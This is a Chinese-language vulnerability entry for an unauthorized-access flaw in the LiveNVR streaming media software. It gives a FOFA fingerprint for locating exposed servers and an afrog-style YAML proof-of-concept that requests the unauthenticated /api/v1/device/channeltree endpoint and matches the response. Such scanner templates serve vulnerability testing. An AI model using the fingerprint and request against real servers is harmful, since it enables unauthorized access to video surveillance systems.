livenvr-channeltree-fileread: LiveNVR流媒体服务软件接口存在未授权访问漏洞

漏洞描述

LiveNVR流媒体服务软件接口存在未授权访问漏洞 fofa：icon_hash="-206100324"

PoC代码[已公开]

id: livenvr-channeltree-fileread

info:
  name: LiveNVR流媒体服务软件接口存在未授权访问漏洞
  author: avic123
  severity: high
  verified: true
  description: |
    LiveNVR流媒体服务软件接口存在未授权访问漏洞
    fofa：icon_hash="-206100324"
  reference:
    - https://blog.csdn.net/xc_214/article/details/142548497
  tags: livenvr,fileread
  created: 2025/03/27

rules:
  r0:
    request:
      method: GET
      path: /api/v1/device/channeltree?serial=&pcode
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'code')&&
      response.body.bcontains(b'customName')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/livenvr-channeltree-fileread.yaml